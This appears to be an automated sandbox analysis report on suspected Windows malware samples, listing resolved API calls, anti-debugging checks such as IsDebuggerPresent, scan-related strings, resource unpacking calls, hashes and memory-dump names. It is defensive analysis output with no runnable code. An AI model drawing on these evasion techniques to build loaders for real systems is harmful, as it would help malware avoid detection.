Associated: 00000004.00000002.1866051784.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866268252.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866461791.000000000294B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A3F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A42000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28f0000_brightness.jbxd

Similarity

API ID: Locale$InfoThread
String ID: eeee$ggg$yyyy
API String ID: 4232894706-1253427255
Opcode ID: 8d7e56c3cd8083b617740a9c784422074f00c12cd25528a9e67213cc6f913f65
Instruction ID: e6ed53b4fb15aa67f436e1a775cb50273d291ee87fb120c7ff92f26164ce9e2a
Opcode Fuzzy Hash: 8d7e56c3cd8083b617740a9c784422074f00c12cd25528a9e67213cc6f913f65
Instruction Fuzzy Hash: 6E41F57D7041084BE7D9EB7C889067FF3EBDB86224B504522D75AC3354EA78ED05CA26

Function 02908098 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 36COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02908108,?,?,00000000,?,02907A7E,ntdll,00000000,00000000,02907AC3,?,?,00000000), ref: 029080D6

Part of subcall function 02908140: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,029081C8,?,?,00000000,00000000,?,029080E1,00000000,KernelBASE,00000000,00000000,02908108), ref: 0290818D
Part of subcall function 02908140: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02908193
Part of subcall function 02908140: GetProcAddress.KERNEL32(?,?), ref: 029081A5

GetModuleHandleA.KERNELBASE(?), ref: 029080EA

Strings

KernelBASE, xrefs: 029080D1
AeldnaHeludoMteG, xrefs: 029080B1

Memory Dump Source

Source File: 00000004.00000002.1866087402.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true

Associated: 00000004.00000002.1866051784.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866268252.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866461791.000000000294B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A3F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A42000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28f0000_brightness.jbxd

Similarity

API ID: HandleModule$AddressProc
String ID: AeldnaHeludoMteG$KernelBASE
API String ID: 1883125708-1952140341
Opcode ID: dd760ff2308b9af46ea3b14b569f483fd3d3a1f2dbf86e176726e32ac5c74b88
Instruction ID: 14ed9615e96939f44a524ff704448f297342391ebfffac7d41a7f6c924a9fe13
Opcode Fuzzy Hash: dd760ff2308b9af46ea3b14b569f483fd3d3a1f2dbf86e176726e32ac5c74b88
Instruction Fuzzy Hash: 6EF06239B48308AFE790EBB5DC92D6A77EDFB497047514461B600D3690E670AD108A65

Function 0290F9DC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KernelBase,?,0290FDE0,UacInitialize,0294B37C,0291B9D4,UacScan,0294B37C,0291B9D4,ScanBuffer,0294B37C,0291B9D4,OpenSession,0294B37C,0291B9D4,ScanString), ref: 0290F9E2
GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 0290F9F4

Strings

KernelBase, xrefs: 0290F9DD
IsDebuggerPresent, xrefs: 0290F9EE

Memory Dump Source

Source File: 00000004.00000002.1866087402.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true

Associated: 00000004.00000002.1866051784.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866268252.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866461791.000000000294B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A3F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A42000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28f0000_brightness.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: IsDebuggerPresent$KernelBase
API String ID: 1646373207-2367923768
Opcode ID: a55f952a4341bde36879063a64c868c711298dca5013450a6a760839367d6ab0
Instruction ID: ed7b18cf351afaddfd209dffd89210d2f8ccaaff17ee6ef08306bed5db23d139
Opcode Fuzzy Hash: a55f952a4341bde36879063a64c868c711298dca5013450a6a760839367d6ab0
Instruction Fuzzy Hash: 63D0129A7503941DB950B2F91CC481D138C895873D3240F20B136C24E3FA6A89115511

Function 028FC474 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,?,0291D10B,00000000,0291D11E), ref: 028FC47A
GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 028FC48B

Strings

GetDiskFreeSpaceExA, xrefs: 028FC485
kernel32.dll, xrefs: 028FC475

Memory Dump Source

Source File: 00000004.00000002.1866087402.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true

Associated: 00000004.00000002.1866051784.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866268252.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866461791.000000000294B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A3F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A42000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28f0000_brightness.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: GetDiskFreeSpaceExA$kernel32.dll
API String ID: 1646373207-3712701948
Opcode ID: bcbf88357c8224b8d99994ba3a20df7e6393957ebb16c5b37017d1e61ca86553
Instruction ID: 2156ade97aa5391c89695d4feca638c6829e4bb4017bc917e8e15ae48b01285f
Opcode Fuzzy Hash: bcbf88357c8224b8d99994ba3a20df7e6393957ebb16c5b37017d1e61ca86553
Instruction Fuzzy Hash: 0CD05EECA4431A9AF7C0EEF6548063137988328310F00C866EB01D5201E7AA5514CF19

Function 028FE1E8 Relevance: 6.1, APIs: 4, Instructions: 115COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 028FE297
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 028FE2B3
SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 028FE32A
VariantClear.OLEAUT32(?), ref: 028FE353

Memory Dump Source

Source File: 00000004.00000002.1866087402.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true

Associated: 00000004.00000002.1866051784.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866268252.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866461791.000000000294B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A3F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A42000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28f0000_brightness.jbxd

Similarity

API ID: ArraySafe$Bound$ClearIndexVariant
String ID:
API String ID: 920484758-0
Opcode ID: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
Instruction ID: b06ca0e2711e1ec10da47e732f5e37f83e086fb184712242c84192c9d3d3091b
Opcode Fuzzy Hash: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
Instruction Fuzzy Hash: CE41F77DA012299FCBA2DB5DC894BC9B3BEAB49314F0441D5E64CE7221DA30AF818F55

Function 028FAD3C Relevance: 6.1, APIs: 4, Instructions: 102COMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32(?,?,0000001C), ref: 028FAD59
GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 028FAD7D
GetModuleFileNameA.KERNEL32(028F0000,?,00000105), ref: 028FAD98
LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 028FAE2E

Memory Dump Source

Source File: 00000004.00000002.1866087402.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true

Associated: 00000004.00000002.1866051784.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866268252.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866461791.000000000294B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A3F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A42000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28f0000_brightness.jbxd

Similarity

API ID: FileModuleName$LoadQueryStringVirtual
String ID:
API String ID: 3990497365-0
Opcode ID: 44f3f2aafbffaef3addff0b59d651dcb8e2dcaab7386c54b8e978a0bdea7439b
Instruction ID: 4408147c41f0ffef207d798bafefc43f4efe9fc6c685aa80173b3b46e5a0adde
Opcode Fuzzy Hash: 44f3f2aafbffaef3addff0b59d651dcb8e2dcaab7386c54b8e978a0bdea7439b
Instruction Fuzzy Hash: 64416E7DA402589BDBA1DB68CC84BDAB7FDAB08310F4441E5A64CE7241EB74AF848F51

Function 028FAD3A Relevance: 6.1, APIs: 4, Instructions: 101COMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32(?,?,0000001C), ref: 028FAD59
GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 028FAD7D
GetModuleFileNameA.KERNEL32(028F0000,?,00000105), ref: 028FAD98
LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 028FAE2E

Memory Dump Source

Source File: 00000004.00000002.1866087402.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true

Associated: 00000004.00000002.1866051784.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866268252.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866461791.000000000294B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A3F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A42000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28f0000_brightness.jbxd

Similarity

API ID: FileModuleName$LoadQueryStringVirtual
String ID:
API String ID: 3990497365-0
Opcode ID: 93ded1756bbf2ee9648885e8b7cac7e7bb4245be413a8551c21313f4d14ef5a5
Instruction ID: afcc26e973bb6ad51e482f946251913582ff0667247e62ad2cc0a22523c6538d
Opcode Fuzzy Hash: 93ded1756bbf2ee9648885e8b7cac7e7bb4245be413a8551c21313f4d14ef5a5
Instruction Fuzzy Hash: 94415E7CA402589BDBA1EB68CC84BDAB7FD9B48310F4401E5A74CE7241EB74AF848F51

Function 028F1C6C Relevance: 5.3, APIs: 4, Instructions: 330COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1866087402.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true

Associated: 00000004.00000002.1866051784.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866268252.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866461791.000000000294B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A3F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A42000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28f0000_brightness.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0001dee3edc011033b0dc3cebc5f6d8315ffd4ff5020127e6b3b74b647add711
Instruction ID: e3fa5eeb01bf721f03fe69fa63fd808de345d1f5089dac990e42283198862ac8
Opcode Fuzzy Hash: 0001dee3edc011033b0dc3cebc5f6d8315ffd4ff5020127e6b3b74b647add711
Instruction Fuzzy Hash: 08A1F66E7106008BD758AA7C9C883BDB3D2DBD4325F18823EE31DCB785EB68C9518751

Function 028F94EC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79threadCOMMON

Download Yara Rule

APIs

GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,028F95DA), ref: 028F9572
GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,028F95DA), ref: 028F9578

Strings

yyyy, xrefs: 028F954D

Memory Dump Source

Source File: 00000004.00000002.1866087402.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true

Associated: 00000004.00000002.1866051784.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866268252.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866461791.000000000294B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A3F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A42000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28f0000_brightness.jbxd

Similarity

API ID: DateFormatLocaleThread
String ID: yyyy
API String ID: 3303714858-3145165042
Opcode ID: 60d1affd2a8eed54d3ebca7c846d59a2599a8089dbf611d2c1a0a4dbb8c56749
Instruction ID: 3584ea6a0e79893bb4c4632636ebd117d26ab62de3549235eab68ce9e257324a
Opcode Fuzzy Hash: 60d1affd2a8eed54d3ebca7c846d59a2599a8089dbf611d2c1a0a4dbb8c56749
Instruction Fuzzy Hash: 6A21627DA002589FDB90DFA8C841BAE73B9EF49700F5140A6EB05E7250D7349E40CB66

Function 02908204 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON

Download Yara Rule

APIs

Part of subcall function 02908098: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02908108,?,?,00000000,?,02907A7E,ntdll,00000000,00000000,02907AC3,?,?,00000000), ref: 029080D6
Part of subcall function 02908098: GetModuleHandleA.KERNELBASE(?), ref: 029080EA

Part of subcall function 02908140: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,029081C8,?,?,00000000,00000000,?,029080E1,00000000,KernelBASE,00000000,00000000,02908108), ref: 0290818D
Part of subcall function 02908140: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02908193
Part of subcall function 02908140: GetProcAddress.KERNEL32(?,?), ref: 029081A5

FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,0290828E), ref: 02908270

Strings

FlushInstructionCache, xrefs: 0290821D
Kernel32, xrefs: 0290824F

Memory Dump Source

Source File: 00000004.00000002.1866087402.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true

Associated: 00000004.00000002.1866051784.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866268252.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866461791.000000000294B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A3F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A42000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28f0000_brightness.jbxd

Similarity

API ID: HandleModule$AddressProc$CacheFlushInstruction
String ID: FlushInstructionCache$Kernel32
API String ID: 3811539418-184458249
Opcode ID: 881915f726c99fa8e96a652ce524d2dce7cbbdf3f53adbdcb7007651025f7175
Instruction ID: 6c6ef9935f8437cc02e41b2cd44686db77de75da9526315fa2fc5d9fcdc31e6a
Opcode Fuzzy Hash: 881915f726c99fa8e96a652ce524d2dce7cbbdf3f53adbdcb7007651025f7175
Instruction Fuzzy Hash: 6701AD39B44708BFEB50EFA9DC91F6A33EEFB8DB00F504421B600D2280D630ED108A25

Function 0290ADDC Relevance: 5.1, APIs: 4, Instructions: 72COMMON

Download Yara Rule

APIs

IsBadReadPtr.KERNEL32(?,00000004), ref: 0290AE10
IsBadWritePtr.KERNEL32(?,00000004), ref: 0290AE40
IsBadReadPtr.KERNEL32(?,00000008), ref: 0290AE5F
IsBadReadPtr.KERNEL32(?,00000004), ref: 0290AE6B

Memory Dump Source

Source File: 00000004.00000002.1866087402.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true

Associated: 00000004.00000002.1866051784.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866268252.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866461791.000000000294B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A3F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A42000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28f0000_brightness.jbxd

Similarity

API ID: Read$Write
String ID:
API String ID: 3448952669-0
Opcode ID: e720fd1f35371ed8eed611904540eb1dceb651114ec14aff2087e2dc2d652641
Instruction ID: 8e798a4c2ac493c3a059bd3c3659cea967e57731317b52be73a804f4f4dc4471
Opcode Fuzzy Hash: e720fd1f35371ed8eed611904540eb1dceb651114ec14aff2087e2dc2d652641
Instruction Fuzzy Hash: D0218C7564071A9FDB10DF69DCC0BAE73A9EB80725F008211EF64D7281E738E9118AE4

Analysis Process: npratlsN.pifPID: 4544, Parent PID: 8092COMMON

Execution Graph

Execution Coverage:	8.1%
Dynamic/Decrypted Code Coverage:	54.9%
Signature Coverage:	15%
Total number of Nodes:	472
Total number of Limit Nodes:	42

Executed Functions

Function 004019F0 Relevance: 146.0, APIs: 34, Strings: 49, Instructions: 747
comprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OleInitialize.OLE32(00000000), ref: 004019FD
_getenv.LIBCMT ref: 00401ABA
GetCurrentProcessId.KERNEL32 ref: 00401ACD
CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401AD6
Module32First.KERNEL32 ref: 00401C48
CloseHandle.KERNEL32(00000000,?,?,00000008,00000000), ref: 00401C9D
Module32Next.KERNEL32(00000000,?), ref: 00401D02
Module32Next.KERNEL32(00000000,?), ref: 00401DB6
CloseHandle.KERNEL32(00000000), ref: 00401DC4
GetModuleHandleA.KERNEL32(00000000), ref: 00401DCB
FindResourceA.KERNEL32(00000000,00000000,00000008), ref: 00401E90
LoadResource.KERNEL32(00000000,00000000), ref: 00401E9E
LockResource.KERNEL32(00000000), ref: 00401EA7
SizeofResource.KERNEL32(00000000,00000000), ref: 00401EB3
_malloc.LIBCMT ref: 00401EBA
_memset.LIBCMT ref: 00401EDD
SizeofResource.KERNEL32(00000000,?), ref: 00401F02

Strings

x, xrefs: 00401E69
V, xrefs: 00402038
%, xrefs: 004020FA
W, xrefs: 00401B14
{, xrefs: 0040205B
___, xrefs: 0040227D
x, xrefs: 00402088
W, xrefs: 00402033
0, xrefs: 00401BBD
o, xrefs: 00402159
8, xrefs: 00401BA9
E, xrefs: 00401E0F
), xrefs: 0040202E
4, xrefs: 00402074
{, xrefs: 0040211D
!, xrefs: 0040201A
', xrefs: 00402006
5, xrefs: 00402109
4, xrefs: 00401B64
o, xrefs: 00402097
v, xrefs: 00401B5A
[, xrefs: 00401B37
*, xrefs: 004020E1
v, xrefs: 0040206A
!, xrefs: 004020CF
x, xrefs: 00401B78
., xrefs: 0040201F
v, xrefs: 0040212C
x, xrefs: 0040214A
', xrefs: 00401AF6
., xrefs: 00401B0A
h, xrefs: 00401A6F
U, xrefs: 004020F5
6, xrefs: 004020C5
{, xrefs: 00401B4B
:, xrefs: 00401B28
!, xrefs: 00401B1E
_._, xrefs: 00402257
W, xrefs: 004020E6
{, xrefs: 00401E3C
v, xrefs: 00401E4B
W, xrefs: 00401B23
V, xrefs: 00401E19
D, xrefs: 00401DFB
4, xrefs: 00402136
", xrefs: 00401B0F
o, xrefs: 00401B8D
[, xrefs: 00402047
*, xrefs: 00401A1F

Memory Dump Source

Source File: 0000000A.00000002.3432275183.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.3432275183.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.3432275183.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_npratlsN.jbxd

Yara matches

Similarity

API ID: Resource$HandleModule32$CloseNextSizeof$CreateCurrentFindFirstInitializeLoadLockModuleProcessSnapshotToolhelp32_getenv_malloc_memset
String ID: !$!$!$"$%$'$'$)$*$*$.$.$0$4$4$4$5$6$8$:$D$E$U$V$V$W$W$W$W$[$[$_._$___$h$o$o$o$v$v$v$v$x$x$x$x${${${${
API String ID: 1430744539-2962942730
Opcode ID: 5b8530bddefb045e1b9ab2db406c8ab4da3f0b02880ef73395902e6a9a04ea37
Instruction ID: 7b7814addfdf4b3cbdaef5ede101091f5fb3e94df766619d88950efa0d528cfd
Opcode Fuzzy Hash: 5b8530bddefb045e1b9ab2db406c8ab4da3f0b02880ef73395902e6a9a04ea37
Instruction Fuzzy Hash: B3628C2100C7C19EC321DB388888A5FBFE55FA6328F484A5DF1E55B2E2C7799509C76B

Function 2E5C5FA8 Relevance: 5.3, Strings: 4, Instructions: 342
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(o^q, xrefs: 2E5C60B0
(o^q, xrefs: 2E5C60A2
,bq, xrefs: 2E5C6128
,bq, xrefs: 2E5C611A

Memory Dump Source

Source File: 0000000A.00000002.3473791553.000000002E5C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2E5C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2e5c0000_npratlsN.jbxd

Similarity

API ID:
String ID: (o^q$(o^q$,bq$,bq
API String ID: 0-879173519
Opcode ID: 4ee9f83754baa88dfb52a95fc880aeeface0790589b0e3191e8b94efb6836c76
Instruction ID: 46c8f06dbd269d6ba152652fc08df2c8bff7d0894f65c68df2ecd075fb591a6e
Opcode Fuzzy Hash: 4ee9f83754baa88dfb52a95fc880aeeface0790589b0e3191e8b94efb6836c76
Instruction Fuzzy Hash: 99E14E30A10105DFCB00CFA9C9A4AADBBF2FF59B00F159465E915EB261D774EA42CF91

Function 2E5C8F18 Relevance: 3.4, Strings: 2, Instructions: 901COMMON

Download Yara Rule

Strings

4'^q, xrefs: 2E5C99A3
(o^q, xrefs: 2E5C93A8

Memory Dump Source

Source File: 0000000A.00000002.3473791553.000000002E5C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2E5C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2e5c0000_npratlsN.jbxd

Similarity

API ID:
String ID: (o^q$4'^q
API String ID: 0-273632683
Opcode ID: 09f60c22e8c14a9414a3c18aa37c167a0761fd3b9b0e9d9cdf99c548acb2ecf5
Instruction ID: d33f42aa9c2550266d1eb662542a908998aa53d799d81ad37819358685ef8d3d
Opcode Fuzzy Hash: 09f60c22e8c14a9414a3c18aa37c167a0761fd3b9b0e9d9cdf99c548acb2ecf5
Instruction Fuzzy Hash: 1582B030A10609DFCB05CFA8C8A4AAEBBF2FF98300F159559E515DB362D734E981CB51

Function 2E5CAA58 Relevance: 2.9, Strings: 2, Instructions: 351COMMON

Download Yara Rule

Strings

PH^q, xrefs: 2E5CAE86
PH^q, xrefs: 2E5CAE97

Memory Dump Source

Source File: 0000000A.00000002.3473791553.000000002E5C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2E5C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2e5c0000_npratlsN.jbxd

Similarity

API ID:
String ID: PH^q$PH^q
API String ID: 0-1598597984
Opcode ID: 0a7c63afd8701181c41700da1404f7c5563d97092f6cfb38ef94d40bc59a6255
Instruction ID: ccfba5d834d16227d1158e9e0fdae286f7d7f0a683a05c8db7c6e56449ce6279
Opcode Fuzzy Hash: 0a7c63afd8701181c41700da1404f7c5563d97092f6cfb38ef94d40bc59a6255
Instruction Fuzzy Hash: 8EE11774A10218CFDB04CFA9D894A9DBBF2FF59314F15D4A9E909AB366DB30A841CF50

Function 2E5CB1E1 Relevance: 2.7, Strings: 2, Instructions: 192COMMON

Download Yara Rule

Strings

PH^q, xrefs: 2E5CB446
PH^q, xrefs: 2E5CB457

Memory Dump Source

Source File: 0000000A.00000002.3473791553.000000002E5C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2E5C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2e5c0000_npratlsN.jbxd

Similarity

API ID:
String ID: PH^q$PH^q
API String ID: 0-1598597984
Opcode ID: 2fbe94e6cce6075ee01178c7bd4c7b1def13f53dc96e4fc831d9c79523b93197
Instruction ID: 3b936df445a92178771b18321a04ab134bddc413ad1b4d00acd0aeddedfb3e11
Opcode Fuzzy Hash: 2fbe94e6cce6075ee01178c7bd4c7b1def13f53dc96e4fc831d9c79523b93197
Instruction Fuzzy Hash: 3A81B374E10618CFDB54CFAAD8A4A9DBBF2BF88310F14D469E418AB365DB349942CF10

Function 2E5CB4BF Relevance: 2.7, Strings: 2, Instructions: 190COMMON

Download Yara Rule

Strings

PH^q, xrefs: 2E5CB726
PH^q, xrefs: 2E5CB737

Memory Dump Source

Source File: 0000000A.00000002.3473791553.000000002E5C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2E5C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2e5c0000_npratlsN.jbxd

Similarity

API ID:
String ID: PH^q$PH^q
API String ID: 0-1598597984
Opcode ID: 480875d232aad316409fb5ab017156e4855ed080029b0dbeb9faf7173fca8e92
Instruction ID: 5eaedd226044430a3684a3b22495e9ede83c2799eeac089bc59746f629e220bc
Opcode Fuzzy Hash: 480875d232aad316409fb5ab017156e4855ed080029b0dbeb9faf7173fca8e92
Instruction Fuzzy Hash: 6781C274E10618CFDB54CFAAD8A4A9DBBF2BF88300F10D469E409AB365DB349985CF10

Function 2E5CBD5F Relevance: 2.7, Strings: 2, Instructions: 189COMMON

Download Yara Rule

Strings

PH^q, xrefs: 2E5CBFD7
PH^q, xrefs: 2E5CBFC6

Memory Dump Source

Source File: 0000000A.00000002.3473791553.000000002E5C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2E5C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2e5c0000_npratlsN.jbxd

Similarity

API ID:
String ID: PH^q$PH^q
API String ID: 0-1598597984
Opcode ID: e8d8adfaeb1efd7f4e2c052ced3e47368ef084b07cb63de3f9fd4ea0cb180333
Instruction ID: ff4a409e0043c59cb3ca9f07d68aff30209a527892566bbbef0a0631ccc34a4d
Opcode Fuzzy Hash: e8d8adfaeb1efd7f4e2c052ced3e47368ef084b07cb63de3f9fd4ea0cb180333
Instruction Fuzzy Hash: 9681C274E10618CFDB54CFAAC8A4A9DBBF2BF89310F14D469E808AB365DB349945CF10

Function 2E5CBA81 Relevance: 2.7, Strings: 2, Instructions: 189COMMON

Download Yara Rule

Strings

PH^q, xrefs: 2E5CBCE6
PH^q, xrefs: 2E5CBCF7

Memory Dump Source

Source File: 0000000A.00000002.3473791553.000000002E5C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2E5C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2e5c0000_npratlsN.jbxd

Similarity

API ID:
String ID: PH^q$PH^q
API String ID: 0-1598597984
Opcode ID: 473d12ddc6a9614e182ada5d314a9ed4e4aaee37ef4a498ba70f0bde9e0d8f1e
Instruction ID: 5567614f42130a49abf733b98b9161188df88123090dc07ed3ac6799bb0e06ce
Opcode Fuzzy Hash: 473d12ddc6a9614e182ada5d314a9ed4e4aaee37ef4a498ba70f0bde9e0d8f1e
Instruction Fuzzy Hash: 4A81E674E10608CFDB44CFAAD894A9DBBF2BF88314F14D469E808AB365DB359945CF10

Function 2E5C41E1 Relevance: 2.7, Strings: 2, Instructions: 189COMMON

Download Yara Rule

Strings

PH^q, xrefs: 2E5C4458
PH^q, xrefs: 2E5C4447

Memory Dump Source

Source File: 0000000A.00000002.3473791553.000000002E5C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2E5C0000, based on PE: false

Joe Sandbox IDA Plugin

